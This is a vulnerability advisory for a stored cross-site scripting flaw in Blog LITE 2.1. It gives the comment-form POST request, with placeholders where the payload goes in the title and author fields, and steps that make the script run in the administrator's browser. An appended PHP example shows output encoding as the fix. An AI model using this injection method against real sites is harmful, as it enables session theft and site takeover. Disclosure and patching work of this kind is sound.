Author : CraCkEr
Website : https://www.netartmedia.net/blog-lite
Vendor : NetArt Media
Software : Blog LITE 2.1
Vuln Type: Stored XSS
Impact : Manipulate the content of the site
Release Notes:
Allows an attacker to inject malicious code into the website,
giving the ability to steal sensitive information,
manipulate data, and launch additional attacks.
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09
CryptoJob (Twitter) twitter.com/0x0CryptoJob
## Stored XSS
---------------------------------------------------------
POST /blog/index.php HTTP/2
-----------------------------401019026540470155022776857270
Content-Disposition: form-data; name="title"
[XSS Payload]
-----------------------------401019026540470155022776857270
Content-Disposition: form-data; name="content"
-----------------------------401019026540470155022776857270
Content-Disposition: form-data; name="author"
[XSS Payload]
-----------------------------401019026540470155022776857270
Content-Disposition: form-data; name="email"
-----------------------------401019026540470155022776857270
## Steps to Reproduce:
1. Visit any category on the blog
2. Write a comment (as Guest)
3. Inject your [XSS Payload] in "Comment Title"
4. Inject your [XSS Payload] in "Your Name"
5. Submit
6. By default the blog disables your comment until the admin checks it
7. The admin checks the [BLOG POSTS] in the Administration Panel at this path (https://website/blog/admin/index.php?page=posts)
8. When the admin checks the comments at this path (https://website/blog/admin/index.php?page=comments&id=2)
9. The XSS will fire and execute in the admin's browser
[-] Done
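
The rendering-side fix for the "title" and "author" fields, as an added example that is not part of the original advisory and not Blog LITE's own code. The function names, length limits and the comment array layout are hypothetical, and harmless markup stands in for [XSS Payload].

```php
<?php
// Added example, not Blog LITE code. Field names follow the request above;
// function names, limits and the $comment layout are hypothetical.

// Input side: trim, drop control characters and cap length before storing.
function normalize_comment_field(string $value, int $maxLen): string
{
    $value = trim($value);
    // preg_replace returns null on invalid UTF-8; treat that as empty input.
    $value = preg_replace('/[\x00-\x1F\x7F]/u', '', $value) ?? '';
    return mb_substr($value, 0, $maxLen, 'UTF-8');
}

// Output side: encode for the HTML context at the point of rendering.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Vulnerable pattern: stored values are concatenated into the admin page as-is.
function render_comment_row_unsafe(array $c): string
{
    return '<tr><td>' . $c['title'] . '</td><td>' . $c['author'] . '</td></tr>';
}

// Hardened pattern: every stored field is encoded where it is written out.
function render_comment_row(array $c): string
{
    return '<tr><td>' . e($c['title']) . '</td><td>' . e($c['author']) . '</td></tr>';
}

// Constructed sample comment as a guest might submit it.
$comment = [
    'title'  => normalize_comment_field('<u>marker</u>', 200),
    'author' => normalize_comment_field('guest" data-x="1', 100),
];

echo render_comment_row_unsafe($comment), PHP_EOL; // markup reaches the browser intact
echo render_comment_row($comment), PHP_EOL;        // markup arrives as inert text
```

Encoding belongs at output because the stored value is rendered in more than one place (the public post page and the admin comments view), and each of those must encode it for its own context.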
© CraCkEr 2023